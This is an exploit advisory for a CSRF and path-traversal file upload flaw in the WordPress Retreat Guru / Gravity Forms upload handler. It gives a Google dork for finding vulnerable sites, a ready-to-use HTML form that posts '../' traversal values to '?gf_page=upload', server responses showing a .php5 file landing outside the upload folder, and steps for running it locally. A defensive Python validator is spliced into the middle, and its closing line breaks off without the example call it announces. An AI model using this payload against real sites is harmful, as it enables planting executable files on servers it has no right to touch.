KingSkrupellos

WordPress Retreat Guru Cross Site Request Forgery

May 21st, 2019
####################################################################

# Exploit Title : WordPress Retreat Guru Cross Site Request Forgery
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 22/05/2019
# Vendor Homepage : retreat.guru - gravityforms.com
# Software Affected Versions : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Site by Retreat Guru site:com
# Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
WordPress Retreat Guru is vulnerable to cross-site request forgery, caused by
improper validation of user-supplied input. By persuading an authenticated user to visit
a malicious web site, a remote attacker could cause a crafted HTTP request to be sent and
perform unauthorized actions. An attacker could exploit this vulnerability to perform
cross-site scripting attacks, web cache poisoning, and other malicious activities.
In this report the upload handler behind ?gf_page=upload accepts form_id and
gform_unique_id values containing "../" and writes the uploaded file under the traversed
path, as the successful server response below shows.

The web application does not, or cannot, sufficiently verify whether a well-formed,
valid, consistent request was intentionally provided by the user who submitted it.
When a web server is designed to receive a request from a client without any mechanism
for verifying that it was intentionally sent, an attacker may be able to trick a
client into making an unintentional request to the web server, which will be treated as an
authentic request. This can be done via a URL, image load, XMLHttpRequest, etc., and
can result in exposure of data or unintended code execution.

####################################################################

# CSRF Cross Site Request Forgery Exploit :
****************************************
<html>
<head><title>WordPress Retreat Guru Input Exploiter</title></head>
<body>

<form action="http://[VULNERABLEWEBSITE]/?gf_page=upload" method="post" enctype="multipart/form-data">

<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type="hidden">
<input name="name" value="kingskrupellos.html" type="hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">

</form>

</body>
</html>

# Directory File Path :
***********************
/_input__kingskrupellos.php5

/_input__[YOURFILENAME].php5

# Server Response [ Failed ] :
*******************
{"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}

# Server Response [ Successful ] :
*******************************
{"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}

# Allowed File Extensions :
*************************
.html .htm .php5 .php2 .txt .jpg .gif .png .html.fla .phtml .pdf

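Added here as a defender-side illustration, not part of the original advisory: the check below shows the input validation the upload handler in this report lacks, namely numeric form and field ids, a token-shaped gform_unique_id, a path-free filename, and an extension allowlist that excludes script-capable types such as .php5 and .phtml (which common PHP server configurations execute). The upload root, the on-disk naming template and the token format are assumptions, not Gravity Forms' own.

```python
import os
import re

# Constructed demo values; the real upload root and naming scheme are assumptions.
UPLOAD_ROOT = "/var/www/html/wp-content/uploads/gravity_forms/tmp"
SAFE_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
# Extensions a PHP web server may execute or that allow stored HTML/JS; the
# advisory's allowlist let .php5 and .phtml through.
EXECUTABLE_EXTENSIONS = {"php", "php2", "php3", "php4", "php5", "php7",
                         "phtml", "phar", "html", "htm", "shtml"}
ID_RE = re.compile(r"[0-9]{1,10}")
UNIQUE_ID_RE = re.compile(r"[A-Za-z0-9]{1,32}")  # assumed token format


def check_upload(form_id, gform_unique_id, field_id, name):
    """Validate the upload request fields; return (accepted, reason, destination)."""
    if not ID_RE.fullmatch(form_id) or not ID_RE.fullmatch(field_id):
        return False, "form_id/field_id must be numeric", None
    if not UNIQUE_ID_RE.fullmatch(gform_unique_id):
        return False, "gform_unique_id has unexpected characters", None
    # Reject any path component in the client filename, including backslashes,
    # so "../../x.png" and "..\\x.png" never reach the path join below.
    if name != os.path.basename(name) or "\\" in name or name in ("", ".", ".."):
        return False, "filename contains path components", None
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "filename has no extension", None
    # Check every dotted segment, so double extensions like pic.jpg.phtml fail too.
    if set(parts[1:]) & EXECUTABLE_EXTENSIONS:
        return False, "executable or script-capable extension", None
    if parts[-1] not in SAFE_EXTENSIONS:
        return False, "extension not on allowlist", None
    # Assumed naming template; the commonpath check is defence in depth so the
    # final path can never leave UPLOAD_ROOT even if a field check is loosened.
    dest = os.path.normpath(os.path.join(
        UPLOAD_ROOT, f"{form_id}_{gform_unique_id}_{field_id}_{name}"))
    if os.path.commonpath([UPLOAD_ROOT, dest]) != UPLOAD_ROOT:
        return False, "destination escapes upload root", None
    return True, "ok", dest
```

The first call below mirrors the field values from the form in this report and is rejected at the first check.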
# Example Usage for Windows :
******************************
# Use the XAMPP Control Panel with your localhost.
# Place the file in the htdocs folder of XAMPP.

# 127.0.0.1/wordpressretreatguruexploiter.html

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################